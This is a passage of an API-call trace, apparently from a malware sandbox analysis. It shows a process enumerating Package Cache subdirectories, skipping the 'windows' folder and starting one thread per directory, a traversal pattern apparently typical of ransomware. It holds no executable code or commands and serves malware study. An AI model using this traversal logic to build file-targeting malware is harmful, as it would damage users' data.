cFileName="{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017", cAlternateFileName="{582EA~1.250")) returned 1 [0040.435] lstrcmpW (lpString1=".", lpString2="{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017") returned -1 [0040.435] lstrcmpW (lpString1="..", lpString2="{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017") returned -1 [0040.435] lstrcmpiW (lpString1="windows", lpString2="{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017") returned 1 [0040.436] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\*.*" [0040.436] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\*.*") returned 40 [0040.437] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\", lpString2="{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017" [0040.437] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\*.*" [0040.437] GlobalMemoryStatus (in: lpBuffer=0xed4fd10 | out: lpBuffer=0xed4fd10) [0040.437] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10e970a0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2a0 [0040.437] CloseHandle (hObject=0x2a0) returned 1 [0040.438] FindNextFileW (in: hFindFile=0x5a5d70, lpFindFileData=0xed4fd30 | out: lpFindFileData=0xed4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf94d4300, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0xf94d4300, ftLastWriteTime.dwHighDateTime=0x1d2fc27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017", cAlternateFileName="{68306~1.250")) returned 1 [0040.438] lstrcmpW (lpString1=".", lpString2="{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017") returned -1 [0040.438] lstrcmpW (lpString1="..", lpString2="{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017") returned -1 [0040.438] lstrcmpiW (lpString1="windows", lpString2="{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017") returned 1 [0040.439] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\*.*" [0040.439] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\*.*") returned 40 [0040.439] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\", lpString2="{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017" [0040.440] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\*.*" [0040.440] GlobalMemoryStatus (in: lpBuffer=0xed4fd10 | out: lpBuffer=0xed4fd10) [0040.440] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10eaf108, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2a0 [0040.440] CloseHandle (hObject=0x2a0) returned 1 [0040.440] FindNextFileW (in: hFindFile=0x5a5d70, lpFindFileData=0xed4fd30 | out: lpFindFileData=0xed4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa931c450, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa931c450, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa931c450, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017", cAlternateFileName="{8D4F7~1.250")) returned 1 [0040.440] lstrcmpW (lpString1=".", lpString2="{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017") returned -1 [0040.441] lstrcmpW (lpString1="..", lpString2="{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017") returned -1 [0040.441] lstrcmpiW (lpString1="windows", lpString2="{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017") returned 1 [0040.443] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\*.*" [0040.443] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\*.*") returned 40 [0040.443] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\", lpString2="{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017" [0040.443] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\*.*" [0040.443] GlobalMemoryStatus (in: lpBuffer=0xed4fd10 | out: lpBuffer=0xed4fd10) [0040.443] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10ec7170, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2a0 [0040.444] CloseHandle (hObject=0x2a0) returned 1 [0040.444] FindNextFileW (in: hFindFile=0x5a5d70, lpFindFileData=0xed4fd30 | out: lpFindFileData=0xed4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a1e5b40, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a20bca0, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1a20bca0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005", cAlternateFileName="{929FB~1.210")) returned 1 [0040.444] lstrcmpW (lpString1=".", lpString2="{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005") returned -1 [0040.444] lstrcmpW (lpString1="..", lpString2="{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005") returned -1 [0040.444] lstrcmpiW (lpString1="windows", lpString2="{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005") returned 1 [0040.445] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\*.*" [0040.446] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\*.*") returned 40 [0040.446] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\", lpString2="{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005" [0040.446] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\*.*" [0040.446] GlobalMemoryStatus (in: lpBuffer=0xed4fd10 | out: lpBuffer=0xed4fd10) [0040.446] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10edf1d8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2a0 [0040.447] CloseHandle (hObject=0x2a0) returned 1 [0040.447] FindNextFileW (in: hFindFile=0x5a5d70, lpFindFileData=0xed4fd30 | out: lpFindFileData=0xed4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a199880, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a1e5b40, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1a1e5b40, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005", cAlternateFileName="{A749D~1.210")) returned 1 [0040.447] lstrcmpW (lpString1=".", lpString2="{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005") returned -1 [0040.447] lstrcmpW (lpString1="..", lpString2="{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005") returned -1 [0040.447] lstrcmpiW (lpString1="windows", lpString2="{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005") returned 1 [0040.448] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\*.*" [0040.448] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\*.*") returned 40 [0040.449] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\", lpString2="{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005" [0040.449] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\*.*" [0040.449] GlobalMemoryStatus (in: lpBuffer=0xed4fd10 | out: lpBuffer=0xed4fd10) [0040.449] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10ef7240, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2a0 [0040.449] CloseHandle (hObject=0x2a0) returned 1 [0040.449] FindNextFileW (in: hFindFile=0x5a5d70, lpFindFileData=0xed4fd30 | out: lpFindFileData=0xed4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedbebcc0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xedbebcc0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030", cAlternateFileName="{B1755~1.610")) returned 1 [0040.450] lstrcmpW (lpString1=".", lpString2="{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030") returned -1 [0040.450] lstrcmpW (lpString1="..", lpString2="{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030") returned -1 [0040.450] lstrcmpiW (lpString1="windows", lpString2="{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030") returned 1 [0040.451] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\*.*" [0040.451] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\*.*") returned 40 [0040.451] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\", lpString2="{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030" [0040.451] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\*.*" [0040.451] GlobalMemoryStatus (in: lpBuffer=0xed4fd10 | out: lpBuffer=0xed4fd10) [0040.452] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10f0f2a8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2a0 [0040.452] CloseHandle (hObject=0x2a0) returned 1 [0040.452] FindNextFileW (in: hFindFile=0x5a5d70, lpFindFileData=0xed4fd30 | out: lpFindFileData=0xed4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xecd7d760, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedbebcc0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xedbebcc0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030", cAlternateFileName="{BD95A~1.610")) returned 1 [0040.452] lstrcmpW (lpString1=".", lpString2="{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030") returned -1 [0040.452] lstrcmpW (lpString1="..", lpString2="{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030") returned -1 [0040.452] lstrcmpiW (lpString1="windows", lpString2="{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030") returned 1 [0040.454] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\*.*" [0040.454] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\*.*") returned 40 [0040.454] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\", lpString2="{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030" [0040.454] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\*.*" [0040.454] GlobalMemoryStatus (in: lpBuffer=0xed4fd10 | out: lpBuffer=0xed4fd10) [0040.454] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10f27310, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2a0 [0040.781] CloseHandle (hObject=0x2a0) returned 1 [0040.781] FindNextFileW (in: hFindFile=0x5a5d70, lpFindFileData=0xed4fd30 | out: lpFindFileData=0xed4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfaaff840, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfaaff840, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xfaaff840, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}", cAlternateFileName="{CA675~1")) returned 1 [0040.781] lstrcmpW (lpString1=".", lpString2="{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}") returned -1 [0040.781] lstrcmpW (lpString1="..", lpString2="{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}") returned -1 [0040.781] lstrcmpiW (lpString1="windows", lpString2="{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}") returned 1 [0041.197] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\*.*" [0041.197] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\*.*") returned 40 [0041.197] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\", lpString2="{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" [0041.197] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\*.*" [0041.197] GlobalMemoryStatus (in: lpBuffer=0xed4fd10 | out: lpBuffer=0xed4fd10) [0041.197] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x112ec1d0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3f0 [0041.204] CloseHandle (hObject=0x3f0) returned 1 [0041.204] FindNextFileW (in: hFindFile=0x5a5d70, lpFindFileData=0xed4fd30 | out: lpFindFileData=0xed4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfab71c60, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfabbdf20, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xfabbdf20, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030", cAlternateFileName="{CF2BE~1.610")) returned 1 [0041.204] lstrcmpW (lpString1=".", lpString2="{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030") returned -1 [0041.204] lstrcmpW (lpString1="..", lpString2="{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030") returned -1 [0041.204] lstrcmpiW (lpString1="windows", lpString2="{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030") returned 1 [0041.206] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\*.*" [0041.206] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\*.*") returned 40 [0041.206] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\", lpString2="{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030" [0041.206] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\*.*" [0041.206] GlobalMemoryStatus (in: lpBuffer=0xed4fd10 | out: lpBuffer=0xed4fd10) [0041.206] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x11334308, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3f0 [0041.213] CloseHandle (hObject=0x3f0) returned 1 [0041.213] FindNextFileW (in: hFindFile=0x5a5d70, lpFindFileData=0xed4fd30 | out: lpFindFileData=0xed4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa93425b0, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa9368710, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa9368710, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017", cAlternateFileName="{E5127~1.250")) returned 1 [0041.213] lstrcmpW (lpString1=".", lpString2="{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017") returned -1 [0041.213] lstrcmpW (lpString1="..", lpString2="{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017") returned -1 [0041.213] lstrcmpiW (lpString1="windows", lpString2="{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017") returned 1 [0041.213] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\*.*" [0041.213] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\*.*") returned 40 [0041.213] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\", lpString2="{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017" [0041.213] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\*.*" [0041.213] GlobalMemoryStatus (in: lpBuffer=0xed4fd10 | out: lpBuffer=0xed4fd10) [0041.213] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x99a2cc0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3f0 [0041.217] CloseHandle (hObject=0x3f0) returned 1 [0041.218] FindNextFileW (in: hFindFile=0x5a5d70, lpFindFileData=0xed4fd30 | out: lpFindFileData=0xed4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa912d270, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa912d270, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa912d270, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{e52a6842-b0ac-476e-b48f-378a97a67346}", cAlternateFileName="{E52A6~1")) returned 1 [0041.218] lstrcmpW (lpString1=".", lpString2="{e52a6842-b0ac-476e-b48f-378a97a67346}") returned -1 [0041.218] lstrcmpW (lpString1="..", lpString2="{e52a6842-b0ac-476e-b48f-378a97a67346}") returned -1 [0041.218] lstrcmpiW (lpString1="windows", lpString2="{e52a6842-b0ac-476e-b48f-378a97a67346}") returned 1 [0041.218] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\*.*" [0041.218] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\*.*") returned 40 [0041.218] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\", lpString2="{e52a6842-b0ac-476e-b48f-378a97a67346}" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}" [0041.218] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\*.*" [0041.218] GlobalMemoryStatus (in: lpBuffer=0xed4fd10 | out: lpBuffer=0xed4fd10) [0041.218] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x99bad28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3f0 